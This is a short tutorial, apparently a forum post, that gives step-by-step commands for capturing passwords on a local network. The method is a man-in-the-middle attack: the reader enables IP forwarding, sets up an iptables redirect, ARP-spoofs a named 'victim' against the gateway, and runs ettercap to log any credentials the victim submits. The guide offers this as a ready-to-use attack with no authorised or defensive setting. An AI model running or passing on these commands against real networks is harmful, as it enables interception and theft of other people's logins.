Packet sniffing passwords

This small + simple guide is for those who want to know some basics,
you will need to be on a linux OS for this, Preferably Kali linux or at the least a distro of Back Track, If you don’t have either of those you will need to install the software

Install software:
sudo apt-get install ettercap (packet sniffing)

#Once connected to the network open up Terminal and type:

# Command 1:

Code:
echo 1> /proc/sys/net/ipv4/ip_forward

# Command 2:

Code:
nano /etc/ettercap/etter.conf

# Hold the down arrow to go down the page untill you see:

Code:
# #------
# #    Linux
# #------
# ...
# #If you use iptables:
#  #redir_command_on = "iptables -t ....
#  #redir_command_of = "iptables -t ....

# Remove the ‘#’ both of the ‘redir_command’, It should look something like this:

Code:
# #If you use iptables:
#   redir_command_on = "iptables -t ....
#   redir_command_of = "iptables -t ....

# once you’ve done that hit: ‘ctrl + x ‘ then ‘y’ then ‘ENTER’

# Command 3:

Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# Command 4:

Code:
arpspoof -i (name if aircard) -t (victim-ip) (gateway-ip)

# EG: arpspoof -i wlan0 -t 192.168.1.59 192.168.1.254

# You can find the ip’s of people on the network using ‘nmap’ (a tutorial will not be supplied here)

# While ‘arpspoof’ is running, open another terminal window and run:

# Command 5:

Code:
ettercap -T -q -i (name of aircard) /(victim-ip)/ /(gateway-ip)/

# EG: ettercap -T -q -i wlan0 /192.168.1.59/ /192.168.1.254/

# Done, If the victim navigates to any page and posts any data (like usernames/passwords) to a webpage
# They will be logged here,

# Note this is likely to show a lot of https warnings, and looks kinda suspicious.

# When you are finished sniffing packets… push ‘crtl + c’ in the terminal running ‘arpspoof’ and
# push ‘q’ in the terminal running ‘ettercap’